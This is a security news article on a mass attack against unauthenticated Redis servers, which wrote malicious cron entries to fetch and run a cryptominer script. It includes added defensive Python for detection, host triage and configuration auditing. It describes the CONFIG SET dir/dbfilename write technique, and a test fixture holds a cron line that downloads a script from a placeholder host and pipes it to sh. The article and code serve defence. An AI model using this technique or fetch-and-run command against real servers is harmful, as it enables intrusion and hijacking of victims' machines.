An unknown attacker has targeted tens of thousands of unauthenticated Redis servers exposed across the internet in an effort to install a cryptocurrency miner.
It is not immediately clear whether all of these hosts were successfully compromised. The attack was made possible by a “lesser known technique” designed to trick the servers into writing data to arbitrary files, a form of unauthorized access that was first documented in September 2018.
“The general idea behind this exploit technique is to configure Redis to write its file-based database to a directory containing a method to authorize a user (like adding a key to ‘.ssh/authorized_keys’), or start a process (like adding a script to ‘/etc/cron.d’)”, Censys said in a new write-up.
The attack surface management platform said it discovered evidence (i.e., Redis commands) of the attacker's efforts to store malicious crontab entries in the “/var/spool/cron/root” file, resulting in the execution of a shell script hosted on a remote server.
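The sequence Censys describes (repoint the dump directory, rename the dump file, then force a save) is visible on the wire as ordinary Redis commands, so it can be detected from Redis's own MONITOR stream. The following detector is an added example, not code from Censys or from the Redis project; the sample MONITOR lines are constructed, the sensitive-directory list is my own choice, and the client address and timestamps are placeholders.

```python
import posixpath
import re
from typing import Dict, List, Optional

# Constructed sample of Redis MONITOR output; not taken from the Censys report.
# Line format: <unix ts> [<db> <client ip:port>] "<COMMAND>" "<arg>" ...
SAMPLE_MONITOR = '''\
1662000001.100000 [0 10.0.0.5:40001] "SET" "session:42" "abc"
1662000002.200000 [0 203.0.113.7:51000] "CONFIG" "SET" "dir" "/var/spool/cron"
1662000002.300000 [0 203.0.113.7:51000] "CONFIG" "SET" "dbfilename" "root"
1662000002.400000 [0 203.0.113.7:51000] "SET" "x" "<crontab line; its content is irrelevant to this detector>"
1662000002.500000 [0 203.0.113.7:51000] "SAVE"
1662000003.000000 [0 10.0.0.5:40001] "GET" "session:42"
'''

LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # quoted args, honouring backslash escapes

# Directories where a dump file becomes executable configuration or credentials
# (assumed list; extend it for your own hosts).
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron.d", "/etc/cron.hourly",
                  "/etc/cron.daily", "/etc/cron.weekly", "/etc/cron.monthly")


def parse_monitor_line(line: str) -> Optional[Dict]:
    """Split one MONITOR line into timestamp, client address and argument list."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return {"ts": float(m.group("ts")),
            "client": m.group("client"),
            "args": ARG_RE.findall(m.group("args"))}


def is_sensitive_dir(path: str) -> bool:
    """True if the dump directory lands in a cron directory or any .ssh directory."""
    norm = posixpath.normpath(path)
    in_cron = any(norm == d or norm.startswith(d + "/") for d in SENSITIVE_DIRS)
    return in_cron or "/.ssh" in norm


def detect_write_primitive(monitor_text: str) -> List[Dict[str, str]]:
    """Flag clients that repoint the RDB dump into a sensitive directory and then save it."""
    alerts: List[Dict[str, str]] = []
    suspicious_dir: Dict[str, str] = {}  # client -> sensitive dir it configured
    for line in monitor_text.splitlines():
        ev = parse_monitor_line(line)
        if ev is None or not ev["args"]:
            continue
        args, client = ev["args"], ev["client"]
        cmd = args[0].upper()
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            key, value = args[2].lower(), args[3]
            if key == "dir" and is_sensitive_dir(value):
                suspicious_dir[client] = value
                alerts.append({"client": client, "reason": f"CONFIG SET dir -> {value}"})
            elif key == "dbfilename" and client in suspicious_dir:
                alerts.append({"client": client,
                               "reason": f"CONFIG SET dbfilename -> {value} (dir={suspicious_dir[client]})"})
        elif cmd in ("SAVE", "BGSAVE") and client in suspicious_dir:
            alerts.append({"client": client,
                           "reason": f"{cmd} with dir={suspicious_dir[client]}: dump written into sensitive path"})
    return alerts


if __name__ == "__main__":
    for alert in detect_write_primitive(SAMPLE_MONITOR):
        print(alert)
```

The state is kept per client address so that a legitimate `SAVE` from a different connection does not inherit another client's suspicious `dir`. MONITOR is expensive on a busy instance, so the same parser can be fed from a packet capture of port 6379 instead; the first alert (the `CONFIG SET dir`) is already actionable on its own, before any file is written.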
The shell script, which is still accessible, is designed to perform the following actions:
- Terminate processes related to system security and monitoring
- Purge log files and command histories
- Add a new SSH key (“backup1”) to the root user's authorized_keys file to enable remote access
- Disable iptables firewall
- Install scanning tools like masscan, and
- Install and run the XMRig cryptocurrency mining application
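Two of the actions above leave host-side artefacts that a responder can check for directly: an unexpected key in root's authorized_keys, and a cron file that Redis wrote as its dump. The triage helpers below are an added example (not Censys's tooling); the key material, the "ops@bastion" allow-list entry, the RDB framing bytes and the placeholder URL are all constructed. The RDB magic check relies on Redis dump files beginning with the ASCII bytes `REDIS`.

```python
import re
from typing import Dict, List, Tuple

# Constructed samples; not artefacts from the reported campaign.
# Two keys in /root/.ssh/authorized_keys: one expected, one with the "backup1" comment.
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKeyMaterial000000000000 ops@bastion
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedKeyMaterial000000000000 backup1
"""

# A /var/spool/cron/root that Redis wrote as its dump file: RDB magic and binary
# framing around the planted cron line (the URL is a reserved placeholder).
SAMPLE_CRON_BYTES = (
    b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x01x\x3e"
    b"\n*/1 * * * * curl -fsSL http://example.invalid/payload.sh | sh\n"
    b"\xff\x00\x00\x00\x00\x00\x00\x00\x00"
)

RDB_MAGIC = b"REDIS"                          # every Redis RDB file starts with this
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")  # OpenSSH key type identifiers
REMOTE_FETCH_RE = re.compile(r"\b(curl|wget)\b.*https?://")


def find_unexpected_ssh_keys(authorized_keys: str, allowed_comments) -> List[Tuple[int, str]]:
    """Return (line number, comment) for keys whose comment is not on the allow-list."""
    findings = []
    for n, raw in enumerate(authorized_keys.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        # The key type may be preceded by an options field (e.g. command="...").
        idx = next((i for i, p in enumerate(parts) if p.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None:
            findings.append((n, "<unparseable entry>"))
            continue
        comment = " ".join(parts[idx + 2:])
        if comment not in allowed_comments:
            findings.append((n, comment or "<no comment>"))
    return findings


def triage_cron_file(data: bytes) -> Dict:
    """Check a cron file for RDB framing and for lines that fetch and run remote content."""
    text = data.decode("utf-8", errors="replace")
    remote = [line for line in text.splitlines() if REMOTE_FETCH_RE.search(line)]
    return {"rdb_magic": data.startswith(RDB_MAGIC), "remote_fetch": remote}


if __name__ == "__main__":
    print(find_unexpected_ssh_keys(SAMPLE_AUTHORIZED_KEYS, {"ops@bastion"}))
    print(triage_cron_file(SAMPLE_CRON_BYTES))
```

Comparing key comments against an allow-list is deliberately crude; a stricter version compares the full key blob against the keys your configuration management actually deploys. The `REDIS` prefix in a cron file is the stronger signal of the two, since no legitimate crontab begins that way, and it survives even if the planted command line is obfuscated.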
The SSH key was reportedly set on 15,526 of the 31,239 unauthenticated Redis servers, suggesting that the attack was attempted on “more than 49% of known unauthenticated Redis servers on the internet”.
However, one of the main reasons why this attack could fail is that the Redis service must be running with elevated permissions (i.e., root) for the adversary to be able to write to the aforementioned cron directory.
“Although this might be the case when running Redis in a container (like docker), where the process might see itself running as root and allow the attacker to write those files,” the Censys researchers said. “But in this case, only the container is affected, not the physical host.”
The Censys report also revealed that there are approximately 350,675 Internet-accessible Redis database services spanning 260,534 unique hosts.
“While most of these services require authentication, 11% (39,405) do not,” the company said, adding that “of the total 39,405 unauthenticated Redis servers we observed, the potential data exposure is greater than 300 gigabytes”.
The top 10 countries with exposed and unauthenticated Redis services are China (20,011), United States (5,108), Germany (1,724), Singapore (1,236), India (876), France (807), Japan (711), Hong Kong (512), the Netherlands (433) and Ireland (390).
China also leads in terms of the amount of data exposed per country, accounting for 146 gigabytes of data, with the United States trailing far behind at around 40 gigabytes.
Censys said it also found numerous instances of misconfigured Redis services, noting that “Israel is one of the only regions where the number of misconfigured Redis servers exceeds the number of properly configured servers.”
To mitigate threats, users are advised to enable client authentication, configure Redis to run only on internal network interfaces, prevent misuse of the CONFIG command by renaming it to something unguessable, and configure firewalls to accept Redis connections only from trusted hosts.
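Three of the four recommendations map onto redis.conf directives (`requirepass`, `bind`, `rename-command`), so they can be checked mechanically. The auditor below is an added example, not Redis documentation or Censys code; the weak and hardened configuration fragments are constructed, and the password value is a placeholder. The firewall recommendation is outside the file and is not checked here.

```python
import shlex
from typing import Dict, List

# Constructed redis.conf fragments; neither comes from the Censys report.
WEAK_CONF = """\
# listens on every interface, no password, CONFIG left enabled
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass "[replace-with-a-long-random-secret]"
rename-command CONFIG ""
dir /var/lib/redis
"""

WILDCARD_ADDRS = ("0.0.0.0", "::")


def parse_redis_conf(conf_text: str) -> Dict[str, List[List[str]]]:
    """Map each directive to every argument list it was given (directives may repeat)."""
    directives: Dict[str, List[List[str]]] = {}
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles quoted values such as: rename-command CONFIG ""
        directives.setdefault(parts[0].lower(), []).append(parts[1:])
    return directives


def audit_redis_conf(conf_text: str) -> List[str]:
    """Return the hardening gaps found; an empty list means every check passed."""
    d = parse_redis_conf(conf_text)
    findings: List[str] = []

    binds = d.get("bind")
    if not binds:
        findings.append("no bind directive: Redis listens on all interfaces")
    else:
        addrs = [a.lstrip("-") for args in binds for a in args]  # '-' marks an optional address
        if any(a in WILDCARD_ADDRS or "*" in a for a in addrs):
            findings.append(f"bind exposes a wildcard address: {' '.join(addrs)}")

    mode = d.get("protected-mode", [["yes"]])[-1]  # Redis defaults to yes when unset
    if not mode or mode[0].lower() != "yes":
        findings.append("protected-mode is off")

    pw = d.get("requirepass")
    if not pw or not pw[-1] or not pw[-1][0]:
        findings.append("no requirepass: unauthenticated clients are accepted")

    renamed = {args[0].upper(): args[1] for args in d.get("rename-command", []) if len(args) >= 2}
    if "CONFIG" not in renamed:
        findings.append("CONFIG command is neither renamed nor disabled")

    return findings


if __name__ == "__main__":
    print("weak:", audit_redis_conf(WEAK_CONF))
    print("hardened:", audit_redis_conf(HARDENED_CONF))
```

`rename-command CONFIG ""` disables the command outright, which is the safest choice where nothing legitimately needs it; renaming it to an unguessable string, as the article suggests, keeps it available to operators while denying it to anonymous clients. `protected-mode` only refuses non-loopback clients when neither `bind` nor a password is configured, so it is a backstop for the other settings rather than a substitute for them.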